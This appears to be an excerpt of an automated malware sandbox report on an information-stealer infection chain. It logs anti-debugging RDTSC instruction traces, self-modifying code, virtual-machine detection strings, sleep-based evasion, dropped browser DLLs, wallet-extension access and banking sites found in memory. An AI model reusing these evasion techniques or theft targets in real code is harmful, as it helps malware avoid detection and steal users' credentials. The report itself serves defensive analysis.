Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B80986 second address: 4B8098C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B8098C second address: 4B80992 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B80992 second address: 4B80996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B80996 second address: 4B80A2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD45510Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007FA0AD455110h 0x00000011 push eax 0x00000012 jmp 00007FA0AD45510Bh 0x00000017 xchg eax, esi 0x00000018 jmp 00007FA0AD455116h 0x0000001d xchg eax, edi 0x0000001e jmp 00007FA0AD455110h 0x00000023 push eax 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FA0AD455111h 0x0000002b adc cx, 7776h 0x00000030 jmp 00007FA0AD455111h 0x00000035 popfd 0x00000036 call 00007FA0AD455110h 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B80A2C second address: 4B80A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 xchg eax, edi 0x00000007 pushad 0x00000008 mov bx, 4EB0h 0x0000000c mov cx, di 0x0000000f popad 0x00000010 mov eax, dword ptr [7781B370h] 0x00000015 pushad 0x00000016 mov edx, 3124D474h 0x0000001b call 00007FA0AD4759DDh 0x00000020 pushfd 0x00000021 jmp 00007FA0AD4759E0h 0x00000026 and ax, 4628h 0x0000002b jmp 00007FA0AD4759DBh 0x00000030 popfd 0x00000031 pop esi 0x00000032 popad 0x00000033 xor dword ptr [ebp-08h], eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B80A81 second address: 4B80A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B80A85 second address: 4B80A89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B80A89 second address: 4B80A8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B80A8F second address: 4B80A95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B80A95 second address: 4B80A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B80A99 second address: 4B80AC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FA0AD4759DCh 0x00000011 xor cl, FFFFFFB8h 0x00000014 jmp 00007FA0AD4759DBh 0x00000019 popfd 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B80AC3 second address: 4B80AC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B80AC9 second address: 4B80AD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov eax, 06CD92DFh 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B80AD9 second address: 4B80B80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 push edi 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d mov bl, 6Dh 0x0000000f pop esi 0x00000010 pushfd 0x00000011 jmp 00007FA0AD455117h 0x00000016 sbb ch, FFFFFF8Eh 0x00000019 jmp 00007FA0AD455119h 0x0000001e popfd 0x0000001f popad 0x00000020 nop 0x00000021 pushad 0x00000022 mov eax, 7CFA8933h 0x00000027 popad 0x00000028 lea eax, dword ptr [ebp-10h] 0x0000002b jmp 00007FA0AD455115h 0x00000030 mov dword ptr fs:[00000000h], eax 0x00000036 pushad 0x00000037 movzx esi, bx 0x0000003a mov bx, 5C7Ch 0x0000003e popad 0x0000003f mov esi, dword ptr [ebp+08h] 0x00000042 pushad 0x00000043 movsx edx, ax 0x00000046 pushfd 0x00000047 jmp 00007FA0AD45510Ah 0x0000004c xor ax, 1798h 0x00000051 jmp 00007FA0AD45510Bh 0x00000056 popfd 0x00000057 popad 0x00000058 mov eax, dword ptr [esi+10h] 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e mov dx, 3E86h 0x00000062 movsx edi, cx 0x00000065 popad 0x00000066 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Special instruction interceptor: First address: C9E81E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Special instruction interceptor: First address: E426E5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Special instruction interceptor: First address: E40DC3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Special instruction interceptor: First address: E6E68C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Special instruction interceptor: First address: ED076D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 62E81E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 7D26E5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 7D0DC3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 7FE68C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 86076D instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Memory allocated: 9F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Memory allocated: 24D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Memory allocated: 22F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 29D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2B70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 4B70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory allocated: 12C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory allocated: 2C80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory allocated: 12C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Memory allocated: 3050000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Memory allocated: 3200000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Memory allocated: 3050000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Memory allocated: 1000000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Memory allocated: 2AC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Memory allocated: 29E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Memory allocated: 1440000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Memory allocated: 1B1A0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\PQ2AUndsdb.exe

Code function: 0_2_04BD06A0 rdtsc

0_2_04BD06A0

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 3621	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 3925	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 1688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 1103	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Window / User API: threadDelayed 1454
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Window / User API: threadDelayed 1187
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 382
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 794
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 765

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\BitcoinCore[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\whiteheroin[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000192001\whiteheroin.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\40365\Beijing.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API coverage: 9.8 %

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7984	Thread sleep count: 69 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7984	Thread sleep time: -138069s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7980	Thread sleep count: 67 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7980	Thread sleep time: -134067s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7948	Thread sleep count: 276 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7948	Thread sleep time: -8280000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7976	Thread sleep count: 57 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7976	Thread sleep time: -114057s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7968	Thread sleep count: 72 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7968	Thread sleep time: -144072s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8060	Thread sleep time: -720000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7964	Thread sleep count: 3621 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7964	Thread sleep time: -7245621s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7960	Thread sleep count: 3925 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7960	Thread sleep time: -7853925s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe TID: 8184	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4864	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1356	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe TID: 2796	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe TID: 7508	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe TID: 5192	Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe TID: 5144	Thread sleep count: 1454 > 30
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe TID: 5144	Thread sleep count: 1187 > 30
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe TID: 6504	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe TID: 5864	Thread sleep time: -60000s >= -30000s

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 25_2_0041B6DA FindFirstFileExW,

25_2_0041B6DA

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\

Source: XBckuYbXje.exe, 0000001C.00000002.2099137805.0000000003D10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: explorer.exe, 00000020.00000000.1994978095.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000I
Source: Set-up.exe, 00000022.00000003.2195097920.0000000003199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: XBckuYbXje.exe, 0000001C.00000002.2099137805.0000000003D10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: explorer.exe, 00000020.00000002.2539794352.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: XBckuYbXje.exe, 0000001C.00000002.2099137805.0000000003D10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: XBckuYbXje.exe, 0000001C.00000002.2099137805.0000000003D10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: wxfM3haI2K.exe, 0000001A.00000002.1943505648.0000000003330000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe@\
Source: XBckuYbXje.exe, 0000001C.00000002.2099137805.0000000003D10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: Set-up.exe, 00000022.00000003.2195097920.0000000003199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: Set-up.exe, 00000022.00000003.2195097920.0000000003199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: XBckuYbXje.exe, 0000001C.00000002.2099137805.0000000003D10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: wxfM3haI2K.exe, 0000001A.00000002.1943505648.0000000003330000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe
Source: XBckuYbXje.exe, 0000001C.00000002.2099137805.0000000003D10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: explorer.exe, 00000020.00000002.2520566005.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SVGA IIES1371
Source: explorer.exe, 00000020.00000002.2520566005.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM
Source: explorer.exe, 00000020.00000002.2520566005.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Set-up.exe, 00000022.00000003.2195097920.0000000003199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: explorer.exe, 00000020.00000002.2539794352.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Set-up.exe, 00000022.00000003.2195097920.0000000003199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: axplong.exe, axplong.exe, 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: XBckuYbXje.exe, 0000001C.00000002.2099137805.0000000003D10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: Set-up.exe, 00000022.00000003.2195097920.0000000003199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: Set-up.exe, 00000022.00000003.2195097920.0000000003199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: XBckuYbXje.exe, 0000001C.00000002.2099137805.0000000003D10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: Set-up.exe, 00000022.00000002.2258344832.0000000000877000.00000002.00000001.01000000.00000016.sdmp	Binary or memory string: Dcarteira\waves-clientFree_PDF_SolutionsVMwareLenovoServiceBridgeIntelNVIDIAAMDNVIDIA Corporationtupdatesmodules
Source: Set-up.exe, 00000022.00000003.2195097920.0000000003199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: XBckuYbXje.exe, 0000001C.00000002.2099137805.0000000003D10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: explorer.exe, 00000020.00000002.2520566005.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
Source: Set-up.exe, 00000022.00000003.2195097920.0000000003199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: Set-up.exe, 00000022.00000003.2195097920.0000000003199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: explorer.exe, 00000020.00000002.2520566005.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: RegAsm.exe, 00000014.00000002.2100304244.0000000005DEA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllb
Source: XBckuYbXje.exe, 0000001C.00000002.2099137805.0000000003D10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: Set-up.exe, 00000022.00000003.2195097920.0000000003199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: XBckuYbXje.exe, 0000001C.00000002.2099137805.0000000003D10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: XBckuYbXje.exe, 0000001C.00000002.2099137805.0000000003D10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: XBckuYbXje.exe, 0000001C.00000002.2099137805.0000000003D10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: XBckuYbXje.exe, 0000001C.00000002.2099137805.0000000003D10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: XBckuYbXje.exe, 0000001C.00000002.2099137805.0000000003D10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: XBckuYbXje.exe, 0000001C.00000002.2099137805.0000000003D10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
